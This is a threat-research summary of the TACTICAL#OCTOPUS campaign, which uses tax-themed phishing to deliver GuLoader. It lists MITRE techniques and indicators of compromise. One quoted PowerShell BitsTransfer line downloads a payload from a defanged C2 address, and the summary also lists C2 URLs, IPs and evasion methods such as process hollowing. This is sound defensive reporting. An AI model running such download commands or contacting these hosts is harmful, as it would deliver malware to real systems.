Threat Research

New TACTICAL#OCTOPUS Attack Campaign Targets US Entities with Malware Bundled in Tax-Themed Documents

Securonix

TACTICAL#OCTOPUS targets US entities with tax-themed phishing, delivering GuLoader/CloudEyE to drop additional payloads. The campaign uses heavily obfuscated VBScript and PowerShell, process hollowing, and multiple C2 channels (notably rebrand.ly) to evade detection and maintain access. Hashtags: #TACTICALOCTOPUS #GuLoader

Keypoints

  • Campaign name and target: A hyper-targeted phishing campaign (TACTICAL#OCTOPUS) aimed at US-based victims during tax season.
  • Primary malware: GuLoader/CloudEyE acts as the delivery loader for additional payloads.
  • Delivery method: Phishing emails with password-protected ZIP attachments containing a .lnk file that launches code, followed by VBScript and PowerShell stagers.
  • Obfuscation and AV evasion: Heavily obfuscated VBScript and PowerShell, with encoded IP addresses and layered code to hinder analysis.
  • Command and control: C2 infrastructure uses multiple URLs and IPs, notably rebrand[.]ly redirects and IPs like 5.8.8[.]100 and 109.206.240[.]67.
  • Impact: In-memory PowerShell/VBScript execution, process hollowing to ieinstal.exe, and data capture (clipboard/keystrokes) with potential persistence.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – ‘A phishing email with a password-protected zip file is delivered to the target using tax-themed lures.’
  • [T1027] Obfuscated/Compressed Files and Information – ‘The VBS script that gets executed … is heavily obfuscated.’
  • [T1059.001] PowerShell – ‘Stage 3: PowerShell execution’ and related obfuscated PowerShell code downloads and executes payloads.
  • [T1059.005] Visual Basic Script (VBS) – ‘The VBS script that gets executed from the shortcut file … is heavily obfuscated.’
  • [T1055.012] Process Hollowing – ‘performs process hollowing to one of two IE utilities, the Internet Explorer Low-MIC Utility Tool, ielowutil.exe or ieinstal.exe.’
  • [T1197] Bits Jobs – ‘Start-BitsTransfer -Source “hxxp://5.8.8[.]100/signal/Traverser.dwp” -Destination …’
  • [T1115] Clipboard Data – ‘ieinstal.exe capturing clipboard data and keystrokes as soon as it started running.’

Indicators of Compromise

  • [IP] C2 IP addresses – 5.8.8.100, 109.206.240.67
  • [Domain] C2 domains/redirects – rebrand[.]ly, goodisgood[.]ru:1977
  • [URL] Example C2/redirect URLs – hxxp://109.206.240[.]67/oy/; hxxps://rebrand[.]ly/spf5wcc; hxxps://rebrand[.]ly/uvhzh3f
  • [File Hash] Lure and payload binaries – 3fc89d5e3e55c0942c6093eef47d87da6c52d6c459a1ad385ae425bd70863b42; 6a45856a160185b57a2e0c059f7eced75d3117a2ead0d75c649b50d9077bdf7f; 3a76d26eb6d4267c47730b002111153f17deb9ae39bbaedacc1caa7c49d1447e; 4d0ebfef45b40e93ec400103685032aadcb2f3427a8a2faa9a70db31bd7e81eb
  • [File Hash] Additional sample files – 29201f916b42e013f24a8a0b2543c25ec04e119b4d0969ddd8aff696f84af7ee; de78ba7cedda5de72f399a0bd7b597e880ebd517144bbeb2dd0a4e12d353d749; fd90d38b7ba7a28b3416c917f8e1f1a670e861fecb9d7402b1aea76ac380589a; 7c5a0ee020e8fb14be5955ee7231191b61f3e077edf638304b046f7d780663bc
  • [File] Notable filenames – FedTaxUS.pdf.lnk; FedTaxUS20&21.zip; Sinsring Lnningsraadenes.exe; JHNGLE8879.zip; SharonYarbrough.zip; WATPCSP.dll

Read more: https://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/